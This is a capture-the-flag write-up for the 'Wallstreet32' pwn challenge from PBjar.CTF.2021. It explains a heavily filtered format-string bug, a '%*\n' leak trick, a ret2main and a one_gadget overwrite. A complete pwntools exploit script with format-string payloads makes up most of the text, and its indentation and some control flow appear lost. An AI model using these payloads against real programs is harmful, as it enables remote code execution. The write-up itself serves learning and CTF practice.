Tags: format-string pwn 


**Wallstreet32** ,

was a pwn challenge from PBjar.CTF.2021.

A kind of heavily restricted format string in one shot. (most people hated them, I like them...)

I finished just after the ctf end, because there was a difference in ld.so & libc mappings in the remote docker.. so it keeps having O solves..

anyway , here is a write-up.

first a quick protection check..


and we reverse the main function buy_stonks(), which is basically an heavily filtered format string vulnerability (max 300 bytes),

where all the possible characters for having a leak, %c %d %x, etc... are forbidden...

you can only use %n and %c and positionnal notation also...


well restricted..??

it makes me think of a trick I found playing in a ctf a while ago..

you can get a leak from the current index in the format string, in decimal notation with this string '%*\n'

yes it's nonsense , but try it, it just works the '\n' is carriage return.. don't ask me why it works, it's probably a libc bug...

and it passes the filter... not well known ... but usefull..

so we will proceed like this... we will use two pointers on stack, that point themselves to another pointer further on stack..

like this we will modify the second pointer with the first... we continue to advance with %c in index, and when we reach the second pointer we write with it..

first we will do a little bruteforce to return to main.. by writing the lsb of buy_stonks() function return address.

we replace the lsb 0x79 by 0x67..like this, we execute again buy_stonks() at return, with the same stack configuration...

then with our two stack pointers, we write the libc got address to stack, as it is needed for the onegadget to works..

then we write the onegadget, instead of the libc_main return address at main() function return...

and we got shell...

P.S.: there is a second version on the github that upload a ROP on stack instead of using a onegadget, but does not make much difference...

see in in action


the exploit

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

context.update(arch="i386", os="linux")
context.log_level = 'error'

def tohex(val, nbits):
return hex((val + (1 << nbits)) % (1 << nbits))

exe = ELF('./wallstreet32')
libc = ELF('./libc.so.6')

if args.REMOTE:
host, port = "", "42006"

print('trying to do a ret2main an to have good stack configuration...')
count = 0
# first we do a little bruteforce for waiting the good stack configuration, and trying a ret2main
while (True):
if args.REMOTE:
p = remote(host,port)
p = process(exe.path)
p.sendlineafter('see?\n', '47')
payload = '%c'*84+'%220c'+'%hhn'+'%c'*3+'%*\n'+'%c'*18+'%119c'+'%hhn'+'%c'+'%*\n'+'%c'+'%*\n'
p.sendlineafter('token?\n', payload)
p.recvuntil('token:\n', drop=True)

# got our leaks
# libc leak (libc got actually)
leak2 = int(p.recvuntil('\n',drop=True),10)
libc.address = (0x100000000+leak2) - 0x1e5000
# progbase leak
leak1 = int(p.recvuntil('\n',drop=True),10)
progbase = leak1 - 0x15f0
# stack leak
leak3 = int(p.recvuntil('\n',drop=True),10)

# if we received back stonks string, the ret2main was successfull
out = p.recvuntil('stonks!\n', timeout=3)
# if it fails, try again...
count +=1
print('try ret2main: '+str(count))

print('ret2main success')
# dump our precious leaks
print('prog base = '+tohex(progbase,32))
print('libc base = '+tohex(libc.address,32))
print('leak stack = '+tohex(leak3,32))

low0 = (leak3 - 0x1d0) & 0xffff

p.sendlineafter('see?\n', '47')

oneg = libc.address + 0x142feb # onegdaget address
got = libc.address + 0x1e5000 # libc got address

# first we setup stack pointers
count = 0
payload = '%c'*76+'%'+str(low0-76)+'c'+'%hn'+'%c'*18+'%218c'+'%hhn'
payload += '%c'*31+'%'+str(0x40)+'c'+'%hhn'
payload += 'Cc'

p.sendlineafter('token?\n', payload)
p.recvuntil('Cc', drop=True)
p.sendlineafter('see?\n', '1')
count += 1

# first we write got address needed by the onegadget on stack
count = 0
while (count<3):
# 1st round we write index to write in 2nd round
payload = '%'+str(count+9)+'c'+'%98$hhn'+'%'+str(0x67-(9+count))+'c'+'%131$hhnCc'
p.sendlineafter('token?\n', payload)
p.recvuntil('Cc', drop=True)
p.sendlineafter('see?\n', '1')

# we write got byte by byte to the stack
payload = '%'+str(0x67)+'c%131$hhn'+'%'+str(0x99+((got>>((count+1)*8)) & 0xff))+'c%122$hhnCc'
p.sendlineafter('token?\n', payload)
p.recvuntil('Cc', drop=True)
p.sendlineafter('see?\n', '1')

# then we replace return address libc_main, with a onegadget address
print('now sending one gadget..')
count = 0
while (count<4):
# 1st round write the index for the 2nd rount
payload = '%'+str(count+0x1c)+'c'+'%98$hhn'+'%'+str(0x67-(0x1c+count))+'c'+'%131$hhnCc'
p.sendlineafter('token?\n', payload)
p.recvuntil('Cc', drop=True)
p.sendlineafter('see?\n', '1')

# 2nd round we write onegagdget address byte by byte
payload = '%'+str(0x67)+'c%131$hhn'+'%'+str(0x99+((oneg>>(count*8)) & 0xff))+'c%122$hhnCc'
p.sendlineafter('token?\n', payload)
p.recvuntil('Cc', drop=True)
p.sendlineafter('see?\n', '1')

# gotshell

*nobodyisnobody still pwning things...*

Original writeup (https://github.com/nobodyisnobody/write-ups/tree/main/PBjar.CTF.2021/pwn/Wallstreet32).